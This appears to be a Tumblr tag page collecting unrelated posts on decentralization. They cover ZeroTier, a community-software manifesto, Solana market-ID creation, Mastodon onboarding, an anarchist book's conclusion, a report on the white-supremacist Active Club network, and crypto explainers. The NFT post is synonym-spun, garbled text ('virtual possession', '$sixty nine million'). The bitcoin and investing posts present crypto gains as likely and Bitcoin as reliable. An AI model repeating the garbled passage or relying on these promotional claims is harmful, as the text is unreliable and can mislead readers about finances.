#Decentralized Network Creation
virtualizationhowto · 8 months
ZeroTier Download and Install: Connect Devices Together from Anywhere
ZeroTier Download and Install: Connect Devices Together from Anywhere #Zerotier #DecentralizedNetwork #SecureMobileDevice #ZerotierVsTraditionalVPNs #SoftwareDefinedNetworking #AdvancedZerotierFeatures #homelab #selfhosted #connectdevicestogether
Networking is often one of the most challenging aspects of connecting devices and using applications. It is also extremely important to consider when self-hosting services or connecting devices together that may be connecting to many different networks across the Internet. Let’s look at Zerotier download and installation to see how it can easily connect multiple devices to the same virtual…
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essential-randomness · 4 months
Enter the FujoVerse™
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Starting 2024's content creation journey with a bang, it's time to outline the principles behind the FujoVerse™: an ambitious (but realistic) plan to turn the web back into a place of fun, joy, and connection, where people build and nurture their own communities and software. (You can also read the article on my blog)
The Journey
As those who follow my journey with @bobaboard or read my quarterly newsletter (linked in the article) know, the used-to-be-called BobaVerse™ is a collection of projects I've been working on since 2020 while pondering an important question: how do we "fix" the modern social web?
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Obviously the joyless landscape that is the web of today is not something a single person can fix. Still, I loved and owed the internet too much to see it wither.
After countless hours of work, I found 3 pillars to work on: community, software ownership and technical education.
Jump in after the cut to learn more about how it all comes together!
Community is where I started from, with good reason! While social networks might trick us into thinking of them as communities, they lack the characteristics that researchers identify as the necessary base for "true community": group identity, shared norms, and mutual concern.
Today, I'm even more convinced community is a fundamental piece of reclaiming the web as a place of joy. It's alienating, disempowering, and incredibly lonely to be surrounded by countless people without feeling true connection with most of them (or worse, feeling real danger).
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Software Ownership and Collaboration
As I worked with niche communities "software ownership" also became increasingly important to me: if we cannot expect mainstream tech companies to cater to communities at the margins, it follows that these communities must be able to build and shape their own software themselves.
Plenty of people have already discussed how this challenge goes beyond the tech. Among many, "collaboration" is another sticking point for me: effective collaboration requires trust and psychological safety, both of which are in short supply these days (community helps here too, but it's still hard).
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Education (Technical and Beyond)
As I worked more and more with volunteers and other collaborators, however, another important piece of the puzzle showed itself: the dire state of educational material for non-professional web developers. How can people change the web if they cannot learn how to *build* the web?
(And yes, learning HTML and CSS is absolutely important and REAL web development. But to collaborate on modern software you need so much more. Even further, people *yearn* for more, and struggle to find it. They want that power, and we should give it to them.)
Once again, technical aspects aren't the only ones that matter. Any large-scale effort needs many skills that society doesn't equip us with. If we want to change how the web looks, we must teach, teach, TEACH! If you've seen me put so much effort into streaming, this is why :)
And obviously, while I don't go into them in this article, open source software and decentralized protocols are core to "this whole thing".
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The Future
All of this said, while I've been working on this for a few years, I've struggled to find the support I need to continue this work. To this end, this year I'm doing something I'm not used to: producing content, gaining visibility, and putting my work in front of the eyes of people that want to fight for the future of the web.
This has been a hard choice: producing content is hard and takes energy and focus away from all I've been doing. Still, I'm committed to doing what it takes, and (luckily) content and teaching go hand in hand. But the more each single person helps, the less I need to push for wide reach.
If you want to help (and read the behind the scenes of all I've been working on before everyone else), you can subscribe to my Patreon or to my self-hosted attempt at an alternative.
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I deeply believe that in the long term all that we're building will result in self-sustaining projects that will carry this mission forward. After all, I'm building them together with people who understand the needs of the web in a way that no mainstream company can replicate.
Until we get there, every little bit of help (be it monetary support, boosting posts, pitching us to your friends, or kind words of encouragement and support) truly matters.
In exchange, I look forward to sharing more of the knowledge and insights I've accrued with you all :)
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And once again, to read or share this post from the original blog, you can find it here.
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brandonmillman · 2 months
Create Openbook Market ID - Raydium Market ID 0.23 SOL
What is an Openbook Market ID?
Raydium.io, one of the most popular DeFi platforms on the Solana network, requires you to create an "Openbook Market ID" to list and trade your token project on the platform. OpenBook is a decentralized and open-source tool of the Serum V3 program on Solana. Creating an Openbook Market ID is mandatory to list on DeFi platforms such as Raydium.io.
0.23 Creating a Market ID in exchange for SOL
The cost of creating a Market ID on Raydium.io is usually around "3 SOL". However, through Openbookgui.com, one of the platforms that supports Openbookv2, you can create a 100% compatible market ID for only 0.23 SOL. With this method, you can create a market ID that is fully compatible with Serum V3 liquidity. You can access the Openbookgui.com website via the following link https://www.openbookgui.com/
Note: On platforms like Dexlab, it is strongly discouraged to try to reduce the fee by changing the "Length" values. This is the wrong approach and can lead to errors in Serum V3 liquidity. As a result of these errors, users may encounter frequent errors in trading, which will seriously damage your project's reputation. I have made the video below for you to better understand all the steps and to see how easy the process is.
Steps to Create Openbook Market ID
First, go to https://www.openbookgui.com/ and connect your Phantom wallet (Openbook v2 is only supported by Phantom and requires a non-mobile device).
Base Mint: In this field you need to enter your token contract address.
Quote Mint: You do not need to change this field, but you can use USDC or USDT if you wish.
USDC Address: EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v
USDT Address: Es9vMFrzaCERmJfrF4H2FYD4KCoNkY11McCe8BenwNYB
Min. Order Size: This is set to "1" by default, but you can customize it if you want by referring to the table below.
Price Tick: This is set to "4" by default, but you can customize it.
You can use the examples below to customize your Tickers settings.
Review all your settings and make sure you have enough (0.23 SOL) in your account, then click the "Create" button to complete the process. Market ID creation takes approximately 15 seconds.
In my next article with more information about Raydium.io liquidity, I will try to explain the topic with simpler explanations and examples. Goodbye for now and good luck!
Openbook-v2: https://github.com/openbook-dex/openbook-v2/blob/master/idl/openbook_v2.json
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rhe-toric · 1 year
The Disruptive Potential of Cryptocurrency, Blockchain, and DLT
Cryptocurrency, blockchain, and Distributed Ledger Technology (DLT) have been disrupting industries and challenging traditional business models since their inception. These technologies have the potential to revolutionize the way we do business, interact with each other, and even govern ourselves. In this blog post, we will explore the disruptive potential of cryptocurrency, blockchain, and DLT.
Cryptocurrency, such as Bitcoin and Ethereum, is a decentralized digital currency that uses cryptography to secure transactions and control the creation of new units. Cryptocurrency has the potential to disrupt traditional financial systems by providing a more secure and transparent way to transfer value. Cryptocurrency eliminates the need for intermediaries, such as banks, and can help reduce transaction fees and increase financial inclusion.
Blockchain is a distributed ledger that records transactions in a secure and transparent way. Each block in the chain contains a cryptographic hash of the previous block, creating an immutable record of all transactions on the network. Blockchain has the potential to disrupt a wide range of industries, including finance, healthcare, and supply chain management. Blockchain can help increase transparency, reduce fraud, and improve efficiency.
Distributed Ledger Technology (DLT)
DLT is a type of database that is distributed across a network of computers. Each computer in the network has a copy of the database, and any changes to the database are recorded in a transparent and immutable way. DLT has the potential to disrupt a wide range of industries, including finance, healthcare, and government. DLT can help increase transparency, reduce fraud, and improve efficiency.
Disruptive Potential
The disruptive potential of cryptocurrency, blockchain, and DLT is significant. Here are some of the ways that these technologies could disrupt traditional industries: Finance Cryptocurrency and blockchain have the potential to disrupt traditional financial systems by providing a more secure and transparent way to transfer value. Cryptocurrency eliminates the need for intermediaries, such as banks, and can help reduce transaction fees and increase financial inclusion. Blockchain can also help reduce fraud and increase transparency in financial transactions. Healthcare
Blockchain and DLT have the potential to disrupt the healthcare industry by providing a more secure and transparent way to store and share patient data. Blockchain can help increase patient privacy and reduce the risk of data breaches. DLT can also help improve the efficiency of healthcare systems by reducing administrative costs and improving supply chain management.
DLT has the potential to disrupt traditional government systems by providing a more secure and transparent way to store and share data. DLT can help increase transparency and reduce fraud in government transactions. DLT can also help improve the efficiency of government systems by reducing administrative costs and improving data management.
Cryptocurrency, blockchain, and DLT have the potential to disrupt traditional industries and revolutionize the way we do business, interact with each other, and even govern ourselves. These technologies offer a more secure and transparent way to transfer value, store and share data, and reduce fraud. As these technologies continue to evolve, we can expect to see more innovative solutions emerge that have the potential to disrupt traditional industries even further.
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bonitalissa · 1 year
A How-To Guide for Mastodon!
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What is Mastodon? - It is a social network that is decentralized and part of the Fedivese.
Okay, but what's the Fediverse? - The fediverse is an ensemble of federated (i.e. interconnected) servers that are used for web publishing (i.e. social networking, microblogging, blogging, or websites) and file hosting, but which, while independently hosted, can communicate with each other.
Essentially, what "decentralized" means, is that each server in Mastodon (called "instances") is interconnected to be able to talk to each other on any instance but also each instance is a sort of micro-community of similar interests and/or values that can be managed as a smaller community within the Fediverse.
So, how do I use this? It sounds complicated! - It honestly does sound complicated and it's easy to get overwhelmed at first, but what new technology doesn't when you first look at it?
Let's take a look at signing up first! (long post I'm sorry, but I try to break things down as understandable as possible with pictures!)
*Note - this information is up-to-date for 4.0 version on Tuesday, November 15, 2022
So, first thing you might see when searching up how to join Mastodon is that there's tons of instances (or, servers) that you can create an account with. I'd recommend first looking at the official server page found here to see what kind of options you have! The biggest thing to keep in mind is that this list is absolutely NOT exhaustive and there are many, many more options than are listed. Ones that are even more exclusive to interests or cultures or other groups! You can search up your special interests in Google to see if there's a Mastodon server that is currently taking applications or are open to all account creations. Alternatively, you can use something like this instance helper in order to find an instance that is more geared towards your values and interests. Once you choose your instance and go to sign up, it'll look similar to this. As you can see, there's two links under the normal boxes for username and passwords and such.
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Most, if not every, instance (worth their salt, I might add) has a list of rules and TOS that must be agreed to when you sign up. Please make sure you read these carefully as these instances are very serious about moderation.
Let me show you an example of what the rules list and terms look like from my instance (mastadon.lol)
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This is all located on mastodon.lol About page. While your instance won't look exactly like this it may appear similar with the dropdown and explanation of everything you might need to know.
Now that you've read all the TOS and Rules, you're ready to click the "I agree" checkbox and create your account!
Now that we've created the account which is, arguably the hardest part, let's jump to see what your home page looks like and what all the buttons do!
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Down the center of the page is your "home feed", in which anyone you are following, their posts will show up there, also anything that people you follow have boosted (boosted, in this case, means "reblogged" or "retweeted"). One of the biggest differences between Mastodon and other socials is that your Favourites (which are akin to "Likes") will never show up on other people's pages and do not affect any type of algorithm. It's just for you to Fav and the writer will see the notif you Faved their Toot (which is what we call the posts and yes, we know it's silly, but calling posts on Twitter "tweets" was also silly) and that's it (well, plus the little feel-goods that someone saw and liked it enough to favourite it!)
On the top left is the Search bar. That's one of the best ways to find people and topics you're interested in! Mastodon relies on a generous use of hashtags in your toots. You can also use the search in order to find people directly by their @ and server name!
Under the search bar, it's your handle and a quick dropdown under the three dots to ceartain pages (such as follower requests or editing your profile or muted words, etc).
Finally the last spot on the top left is box where you write your toots. Going clockwise from top left, there's where you start your toot, then ou've got your emoji picker on the top right of the box (including special, server-specific added emojis), bottom right is your character count which updates in realtime so you see how much more you can write, and then there's a slew of buttons on the bottom left: (from right to left as is clockwise) Language picker, Content Warning (creates a bar above your toot that you can explain what cw's there are), privacy levels (Public, Unlisted, Followers Only, and Mentioned People Only), Poll maker, and finally the Upload for pics/gifs/vids.
Now we focus on the right side of the screen:
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We'll focus on the top portion in a minute.
At the bottom are the top 3 hashtags trending and roughly how many people (only in your instance) are talking about it.
Just above the trending section is your "Preferences" button. That will take you to your Preferences & Settings page which will have all the sliders and bells and whistles to customize your Mastodon experience to your liking. That might become another post but it is too much for this guide which is just an introduction.
Now we focus on the part that really seems to confuse people (including me when I started) - the whole top right section
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(idk why it's not centering I'm sorry)
So at the top, is your Home button, as previously stated, this is the feed in which you'll see everything from people you follow and whatever toots they boost.
Underneath we have your Notifications tab where you can see who follows you, who favourites your toots, who boosts them, and any replies or mentions of you.
Then we have the Explore tab, as indicated by the little picture to the left of the word, this is where you can see what is going on. There are 4 tabs at the top of the page when you click it
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Posts is all trending posts and boosted posts that are gaining traction on your instance. The Hashtags tab is similar but more like a top 10 of trending hashtags from all over Mastodon. News is what is being talked about by people on this and other servers of the decentralized network right now (kinda like Google News page which links to official news sources and websites). Finally, the For You is just a list of people who you might potentially want to check out and see if you want to follow!
Next we're going to talk about the following two tabs: Local and Federated. The Local tab will show you posts from just your instance you are on, it's a slightly more isolated feed of just people who share your interests. The Federated tab is a bit more of a free-for-all because it shows posts from all over the Fediverse, all different Mastodon servers will throw up posts as fast as it can (but don't worry, somewhere in preferences is an option for "slow mode", though with how many people are on Mastodon now, slow might still be too fast for some people).
Direct Message tab is pretty straight forward. It's where your private messages between other users go.
Favourites, Bookmarks, and Lists; all important all do different things. Favourites is the place where any post that you like goes to, as said before, it doesn't do anything to the algorithm, it doesn't mean your post will get shown to others when they get favourited, it's just a nice feel-good moment that someone showed appreciation to your post, that they vibe with you in that moment. Bookmarks are very different in that no one will ever be alerted when you bookmark a toot, they are there for you to refer back to when you need to so I would recommend being more selective about what you bookmark and periodically clean up your bookmarks tab. Lists are super important in that you can create lists for different categories of topics or users that you want to see at a given moment: have a Twitch list, an Art/Artist list, a Sex Worker list, etc! Lists will allow you to scroll through those feeds individually so you won't have things that don't pertain to what you want to check out at that moment.
I have a whole slew of tips to give out but this post has gone long enough. I hope that this helped you and anyone you chose to share this with understand one of the biggest growing new social media on the internet right now.
You can always find me at this Tumblr, or on Mastodon at https://mastodon.lol/@bonitalissa or on Twitter (for however long it's around) @BonitaLissaTTV
Thank you for taking the time to read this!
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dailyanarchistposts · 24 days
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Conclusion: It Works When We Make It Work
The many people who conspired to commit these rebel stories to paper and get them into your hands have been thoughtful enough to provide you with one parting example of anarchy: the book itself. Imagine the decentralized network, the harmonious chaos, the confluence of liberated desires, that made it possible. With passion and determination millions of people breathed life into the stories we present, and many of them struggled even past the point of certain defeat in the hopes their utopias might inspire future generations. Hundreds of other people documented these worlds and kept them alive in our minds. A dozen more came together to edit, design, and illustrate the book, and even more collaborated with proofreading, printing, and distributing it. We have no boss, nor are we getting paid to do this. In fact, the book is priced at cost and our goal in distributing it is not to make money, but to share it with you.
Publishing is an enterprise we were supposed to leave to the professionals, and books were something we were supposed to buy and consume, not to make ourselves. But we forged ourselves the permission slip to pursue this project, and we hope to show that you can too. It can be tempting to present such ambitious projects as magically final products, leaving the reader to guess how we did it and reveling in the illusion ourselves; however sometimes it’s better to let an inopportune gust of wind blow in, sweep up the curtains, and reveal the machinations backstage. This book, then, proves to be no different from all the other examples illuminated herein, in that its creation was also a matter of constructive conflict. The collection of people immediately responsible for publishing it is not a homogeneous circle, but rather includes editorial groups with distinct modes of operation, and a primary author for whom writing is an individual activity. Because of differering needs and opinions, some people could not see this project through to its end, but as anarchists they were free to leave the group when it was in their interests, and they had already affected the manuscript in good ways. Meanwhile, thanks to a flexibility of organization, the project could go forward.
As the individualist in this group, I learned and developed in ways I would not have had I been working in an authoritarian group. With a traditional publisher, I would be forced to concede whenever a disagreement arose, not because I had been convinced of their point of view but because they controlled more resources and could determine whether the book would make it to print or not. But with our horizontal arrangement, I could receive criticism that I knew was intended to develop the book to its outermost potential, rather than just to make it sell better in a dumbed-down market.
Granted, publishing a book is not the most amazing achievement, and the wee paper thing certainly isn’t about to storm the Winter Palace, feisty as it is, but one of our most basic points is that anarchy is much more commonplace than we’ve been led to believe. And hell, if we can make it work, so can you.
Also like the other stories we’ve told here, the story of our storytelling contains its own weaknesses. We’d like to be the first to point them out. Unavoidably, a couple things are missing. One is a matter of realism. While making this book we’ve tried not to romanticize the examples, though clearly these pages do not provide the space for a full analysis of the strengths and weaknesses of each cited revolution or social experiment. However we wanted to give some indication of the abundance of complexities and difficulties lurking beneath the surface of every example of anarchy. But if the book is at all successful, if you readers do not simply say, Oh, that’s nice, anarchy is possible, and then go back to your lives, but instead you actually arm yourselves with this knowledge to plunge into the creation of an anarchist world, you will quickly discover for yourselves how difficult it is.
The truth is, sometimes anarchy doesn’t work. Sometimes people don’t learn how to cooperate, or a certain group never finds a way to share responsibilities, or infighting leaves an entire movement flatfooted and unable to survive the grave pressures of the world around it. Even some of the examples described in this book eventually fell apart due to their own internal failings. In other cases a liberated community will be brutally repressed, a squatted social center creating a bubble of freedom from state and capital will be kicked out by the landlord, or the state will find some excuse to lock you up for participating in the struggle to create a new world.
Many people who fought for anarchy ended up dead and defeated, or simply demoralized. And their sacrifices will not be celebrated unless we write that history ourselves, to learn from their failures and be inspired by what they won.
Another failing of this book is that we have not been able to romanticize these examples enough. I’m afraid our meekly attempted objectivity omits how inspiring it feels to put anarchy into practice, despite all the difficulties. The stories here are real, on a level deeper than the footnotes, the chronicle of dates and names, can express. Some of these stories I have lived myself, and they are wrapped up in the very writing of the book. The tedious satisfaction of organizing infoshops and learning how to use consensus, in defiance of the stifling psychological terrain of the United States, was my inspiration for starting a book about what an anarchist world would actually look like. Though I still haven’t finished that project, it led me to research what anarchy already had looked like. On a park bench in Berlin, taking a break from studying the autonomous movement of that city, I sketched an outline for this new book, and a couple weeks later, in Christiania, I saw how an entire neighborhood living in anarchy seems perfectly ordinary.
It occurred to me that I might encounter many more living histories if I looked. Over the next year I went to a seventy-five-year-old anarchist camp in the Netherlands, and waded into a continuity of struggle in which the past does not imprison the present, but fertilizes it. I stood in provincial Ukrainian towns that once overthrew authority and tried to imagine how they looked, gardened in an anarchist village in the mountains of Italy and felt down to my very bones what the abolition of work means. As I traveled I corresponded with one of my best friends as he went off to Oaxaca for six months and participated in the rebellion there.
Appropriately enough, I finished my writing in a squat in Barcelona, where I was stuck awaiting trial and threatened with prison time after a police frame-up. The park down the street used to be the city jail, but the anarchists tore it down in 1936. In 2007 our social center took it over in protest of our impending eviction, setting up a free store, putting out a selection of books from our library, telling stories to the children. Unexpectedly illegalized, I found my survival tied up with the network of liberated spaces throughout the city, that housed and nourished me. And these spaces, in turn, depended on all of us fighting to create and defend them.
The same is true of all the other histories we’ve seen: none of them owe their existence to spectators. These stories show that anarchy can work. But we have to build it ourselves. The courage and confidence we need to do this cannot be found in any book. They already belong to us. We only have to claim them.
May these stories jump off their pages and into your hearts, and find new life.
Peter Gelderloos
Barcelona, December 2008
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mindtech047 · 1 month
NFTs and Beyond: The Evolution of Digital Ownership at the Blockchain
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In latest years, Non-Fungible Tokens (NFTs) have transformed the idea of digital ownership, marking a brand new era of blockchain innovation. NFTs are particular virtual property that constitute ownership or authenticity of particular gadgets or content material, verifiable at the blockchain. This article explores the evolution of NFTs and their effect on digital possession.
Definition of NFTs
NFTs are awesome digital belongings that certify ownership or authenticity of a specific item or content. Each NFT is precise and verifiable at the blockchain, making it best for representing digital collectibles, artwork, and other assets.
Overview of Blockchain Technology
Blockchain serves as the inspiration for NFTs, providing a decentralized and immutable ledger for recording transactions. It is a allotted database that continues a constantly growing listing of statistics, or blocks, connected collectively in a chronological chain. This ledger guarantees transparency, protection, and censorship resistance, allowing the creation and transfer of digital assets correctly.
The Rise of NFTs
NFTs trace their origins to early blockchain experiments like Colored Coins and Rare Pepes. However, it become the release of CryptoKitties in 2017 that brought NFTs into the mainstream. Since then, the NFT ecosystem has seen large boom, marked by way of milestones along with the introduction of standards like ERC-721 and ERC-1155 and top notch events like Beeple’s $sixty nine million sale of a virtual artwork.
Understanding the Hype Surrounding NFTs
The hype round NFTs may be attributed to their novelty, shortage, and ability for democratizing get admission to to virtual assets. NFTs have captured the creativeness of creators, creditors, and customers, imparting new avenues for monetization and ownership inside the virtual realm.
Understanding Digital Ownership
Traditional ownership relates to tangible property, at the same time as virtual possession pertains to intangible belongings saved in digital form, like cryptocurrencies and NFTs. Establishing virtual possession offers demanding situations because of the borderless and pseudonymous nature of blockchain transactions, requiring robust security measures and regulatory oversight.
Role of Blockchain in Digital Ownership
Blockchain generation performs a important position in permitting and safeguarding virtual ownership via offering a obvious, tamper-proof, and decentralized ledger. Through cryptographic techniques and consensus algorithms, blockchain networks make sure the integrity and immutability of digital property, facilitating peer-to-peer transactions.
Exploring the Use Cases of NFTs
NFTs have found applications in artwork, gaming, and tokenizing real-global belongings. They have revolutionized the art enterprise through supplying artists with new approaches to monetize their work and engage with a global audience. In gaming, NFTs allow players to very own and change in-game belongings, developing new monetization opportunities and participant-pushed economies.
Advancements in NFT and blockchain technologies have reshaped the digital possession panorama, supplying progressive answers for creators, creditors, and investors. From artwork to gaming to real-global assets, NFTs have the capability to revolutionize possession and switch mechanisms, democratizing get admission to to wealth and possibilities.
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ausetkmt · 7 months
Amid Robert Rundo’s Extradition, the White Supremacist Active Clubs Network Remains a Threat
Robert Rundo, co-founder of the white supremacist Rise Above Movement, is back in the United States, extradited to California from Romania to once again face federal rioting charges. Rundo, who left the United States for southeastern Europe after his criminal case was briefly dismissed in 2019, remained an active participant in the transnational white supremacist movement during his time abroad. Rundo’s time in Europe was characterized by his emergence as a prominent white supremacist leader, driven by his development of “white nationalism 3.0.” 
This decentralized model has resulted in the creation of localized white supremacist Active Clubs, which promote fraternity and a so-called white “warrior spirit,” while also engaging in physical training for what members perceive to be an impending race war. Rundo also established a propaganda arm, Media2Rise, and an online merchandising entity, Will2Rise, to create a white supremacist brand that could expand Active Club messaging and deepen connections between Active Clubs and other white supremacist groups like Patriot Front.
As Rundo returns to the United States to face federal charges five years after his initial arrest, the Active Club network, now the latest iteration of his white supremacist movement, represents an enduring threat and legacy that will persist long after the founder’s potential incarceration.
The Rise of the Rise Above Movement
Rundo co-founded the Rise Above Movement (RAM) in 2017, alongside fellow white supremacist Ben Daley. RAM quickly established itself in the Southern California white supremacist scene, growing from a small crew of right-wing gym enthusiasts to roughly 50 active members. Rundo’s strategic messaging in the early years of RAM played a key role in the group’s initial success, establishing the organization’s brand as the “premier MMA club of the Alt-Right.” As part of this branding, RAM focused on mixed martial arts (MMA), race-based physical fitness, and transforming keyboard warriors into real-world street fighters. Rundo and Daley’s framing allowed the organization to expand its influence beyond the borders of the United States and network with a growing white nationalist fight scene in Europe.
From its inception, RAM sought to act as the “violent vanguard” of the white supremacist movement, taking the mantle from the prominent skinhead gangs of the 1980’s and 1990’s. RAM members functioned as street fighters who wanted to commit acts of violence against those they regarded as their adversaries. They positioned themselves as white patriotic crusaders who were fighting against the perceived threat posed by “communists” or antifa and advocated on behalf of a perceived victimized white population in the United States. 
In 2017, RAM members were part of a series of violent clashes at rallies in Berkeley and Huntington Beach, California. On April 15 of that year, a fight broke out between white supremacists and anti-fascist activists at a rally near UC Berkeley, which resulted in 20 arrests and at least 11 injuries. Rundo was arrested during the event on suspicion of battery of a police officer. Though these charges were later dropped, he celebrated the violence of the day — which became known by white supremacists as the “The Battle of Berkeley” — remarking that the event signaled an “awakening in the White American consciousness.” In August 2017, RAM members also traveled to Charlottesville, Virginia to take part in the deadly “Unite the Right” rally. Three RAM members would later be charged and sentenced for provoking and engaging in fights as part of their conspiracy to riot.
On October 24, 2018, Rundo was taken into custody after he and three fellow RAM members were charged with planning and intentionally engaging in violent attacks and assaults against counter-protesters at various political events in Huntington Beach, San Bernardino, Berkeley, and more. In 2019, the case was temporarily dismissed because the judge ruled parts of the 1968 Federal Riot Act unconstitutional. An appellate court subsequently overturned that ruling.
The de facto Leader of a Decentralized International White Supremacist Network
Rundo fled to Europe soon after his criminal case was temporarily dismissed. While living outside the United States, he reportedly lived a transient lifestyle in eastern Europe. During this period, Rundo sought to maintain relevance within the U.S. white supremacist scene, as well as secure means to finance further extremist activities.
Starting in late 2020, Rundo began to shift his focus towards creating a decentralized international white brotherhood, called “Active Clubs.” Rundo explained this shift in a December 2020 essay, calling it “White Nationalism 3.0.” Rundo imagined a movement of small white supremacist cells that would focus on local-level engagement, making it harder for researchers and law enforcement to identify and shut down their operations.
White Nationalism 3.0 was a departure from many of the traditional white supremacist groups of the past. The model also distanced Rundo from the movement, making it difficult to tie him to any one crew’s illicit activity but allowing him to serve as a de facto leader from afar. The Active Club network reflects a larger trend driving the current white supremacist landscape: replacing hierarchical organizations with decentralized and localized cells. Local regional crews will carry out the group’s core goals while simultaneously pursuing their own local objectives. This “do-it-yourself” white supremacist activity has grown in prominence in recent years, largely in response to federal law enforcement actions targeting hierarchical white supremacist movements like Atomwaffen Division and The Base.
Active Clubs are largely the ideological successor of RAM. They promote a white supremacist worldview that is inspired by the prominent “Great Replacement” conspiracy theory, advocate for raising “white racial consciousness,” and train so-called white “warriors” for an ongoing war against a system that they claim is deliberately plotting against their race. These Active Clubs are deeply rooted in physical fitness and influenced by Rundo’s time in the European MMA-ultranationalist scene. According to Rundo, the Active Club network was meant to “fill the gap” among American white supremacist groups. This decentralized network of European-styled MMA athletic clubs represented a clear organizational shift. RAM was limited to Southern California, but the decentralized Active Club network has now established new nodes across the United States and even abroad. 
In addition to launching the Active Club model, Rundo wanted to build a white supremacist brand empire that would allow him to raise money for his activities abroad, while also bringing the white supremacist community together under stylized optics. Rundo launched Media2Rise in the summer of 2020, a media production arm that serves as a white supremacist news platform. Media2Rise crafts stylized documentaries covering white nationalist events and leadership, such as those by the white supremacist Patriot Front or the National Justice Party. In 2021, Rundo founded Will2Rise, a far-right merchandise company selling everything from clothing, stickers, and even soap sporting white supremacist slogans. The clothing line has since become a staple among white supremacists, regularly being worn by members of groups like Patriot Front, the National Justice Party, and, of course, Active Clubs.
Looking Ahead
Acutely aware of the threat of criminal trial, Rundo set out to create a community resilient enough to withstand any potential arrests of key leadership, including himself. As of August 2023, ADL data shows that Active Clubs claim to maintain an active presence in at least 33 states, including Arizona, California, Montana, Pennsylvania, and Tennessee. In addition, Active Clubs continue to emerge abroad, in countries like Lithuania, France, Estonia, the Netherlands, and Croatia. While the true extent of Active Club membership is opaque, it is unlikely that any resulting prison time for Rundo, or further arrests of key leadership, will significantly stymie this growing decentralized network.
Rundo’s arrest and extradition have become a rallying cry within the international white supremacist landscape, who view the legal process against him as an injustice. “Free Rundo” stencils, stickers, banners, and graffiti have been distributed across the United States and Europe, framing Rundo as a political prisoner facing “federal hoax charges.” Immediately following Rundo’s arrest, individuals associated with Will2Rise and Media2Rise released a public statement: “We can assure you that although one of our movement’s most dedicated activists has been detained, our struggle still continues.” Will2Rise is now crowdfunding for Rundo’s legal fees and brand empire. “Free Rundo” demonstrations have been held in Russia, Sweden, Canada, and more, illustrating the degree to which his influence has expanded.
Regardless of the outcome of Rundo’s trial, new Active Clubs continue to form in both the United States and abroad, while the Will2Rise and Media2Rise franchises remain active nodes for the white supremacist ecosystem. The Active Club network in the United States continues to be one of the most active elements of the white supremacist landscape, regularly organizing fight nights, distributing propaganda, and hosting demonstrations. Perhaps most concerningly, Active Clubs are increasingly targeting LGBTQ+ events in their offline activities. Recent incidents in Montana, Wyoming, Washington, and Oregon have seen local Active Club members protesting drag queen story hours and Pride festivals. As anti-LGBTQ+ narratives and conspiracies continue to serve as potent drivers for extremist mobilization and violence across the United States, the addition of Active Club members seeking to return to the violent origins of RAM only further increases the risk of extremist-related violence within the United States.
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fultocks · 1 year
What is the bitcoin cryptocurrency blockchain, and how does it work?
Bitcoin is a groundbreaking digital currency that operates on a decentralized, peer-to-peer network. Established in 2009, it was created by an anonymous figure or group known as Satoshi Nakamoto. Unlike regular currencies, Bitcoin does not rely on any government or banking institution for its operation but instead relies on a blockchain, a public ledger that records all Bitcoin transactions. Bitcoin has revolutionized the way money is exchanged and is becoming increasingly popular and widely accepted.
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Bitcoin is an extremely valuable digital asset due to its limited supply of 21 million coins. This scarcity makes it a desirable asset for transactions and investments, as its value is likely to increase over time. Additionally, cryptocurrency is decentralized and secure, making it a reliable form of currency.
How Does Bitcoin Cryptocurrency Work?
Bitcoin is a decentralized cryptocurrency that uses advanced cryptography and algorithms to secure transactions and regulate the creation of new units. All transactions are recorded and verified on the blockchain, ensuring that the transactions are immutable and irreversible. By eliminating the need for intermediaries such as banks, Bitcoin provides a secure and reliable way to transfer value with minimal fees and low processing times.
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uniqueinfo · 5 months
Introduction : Brief overview of cryptocurrency investing.
Best Cryptocurrency to Invest in 2023: A Comprehensive Guide
Investing in cryptocurrencies can be both exciting and daunting. With the market constantly evolving, it's crucial to stay informed about the best options for potential investments. In this guide, we'll explore the landscape of cryptocurrency investments, highlighting the top choices and offering insights into the factors that influence their performance.
Cryptocurrency has become a buzzword in the financial world, with investors seeking opportunities in the decentralized digital assets. As the market continues to expand, it's essential to navigate through the various options and make informed decisions.
Understanding Cryptocurrency
At its core, cryptocurrency is a digital or virtual form of currency that uses cryptography for security. Unlike traditional currencies, cryptocurrencies operate on decentralized networks based on blockchain technology, ensuring transparency and immutability.
Factors Influencing Cryptocurrency Investments
Market Trends and Analysis
The cryptocurrency market is known for its volatility, influenced by various factors such as market demand, technological advancements, and macroeconomic trends. Analyzing these trends provides valuable insights for investors.
Regulatory Factors Affecting Investments
Government regulations play a significant role in shaping the cryptocurrency landscape. Understanding the regulatory environment is crucial as it can impact the legality and acceptance of specific cryptocurrencies.
Best Cryptocurrencies to Invest In
As the pioneer of cryptocurrencies, Bitcoin remains a prominent choice for investors. Its historical performance and market dominance make it a relatively stable option, especially for those new to the crypto space.
Beyond being a digital currency, Ethereum is known for its smart contract capabilities, enabling the creation of decentralized applications (DApps). Its potential for future growth is tied to the continued development of the Ethereum ecosystem.
Binance Coin
Operating within the Binance ecosystem, Binance Coin has gained popularity due to its various use cases, including transaction fee discounts and participation in token sales on the Binance Launchpad.
Cardano stands out for its focus on sustainability and scalability. With a unique consensus algorithm and a commitment to research-driven development, Cardano offers features that set it apart from other cryptocurrencies.
Solana boasts impressive speed and scalability, making it a preferred choice for developers. Projects built on Solana benefit from its efficient and low-cost transactions.
Risks and Challenges
While the potential for high returns exists, cryptocurrency investments come with inherent risks. Market volatility, security concerns, and regulatory uncertainties are challenges investors must navigate.
Tips for Successful Cryptocurrency Investing
Diversification of the Portfolio
Diversifying your investment portfolio helps spread risk. Consider allocating funds across different cryptocurrencies to minimize the impact of poor performance in a single asset.
Research and Staying Informed
In the ever-evolving cryptocurrency market, staying informed is crucial. Regularly conduct research, follow market trends, and stay updated on news that may influence your investment decisions.
Risk Management Strategies
Implementing risk management strategies, such as setting stop-loss orders and defining an exit strategy, can help protect your investment from sudden market fluctuations.
Future Trends in Cryptocurrency
As technology advances, new trends emerge in the cryptocurrency space. Keep an eye on developments such as decentralized finance (DeFi), non-fungible tokens (NFTs), and other innovative applications that could shape the future of the market.
Case Studies
Learning from the experiences of successful cryptocurrency investors can provide valuable insights. Additionally, understanding the mistakes made by others can help you avoid common pitfalls.
Frequently Asked Questions (FAQs)
Is cryptocurrency a safe investment?
While the potential for high returns exists, cryptocurrency investments come with risks. It's essential to conduct thorough research and only invest what you can afford to lose.
Which cryptocurrency is the most stable?
Bitcoin is often considered a more stable option due to its long history and market dominance.
How do I diversify my cryptocurrency portfolio?
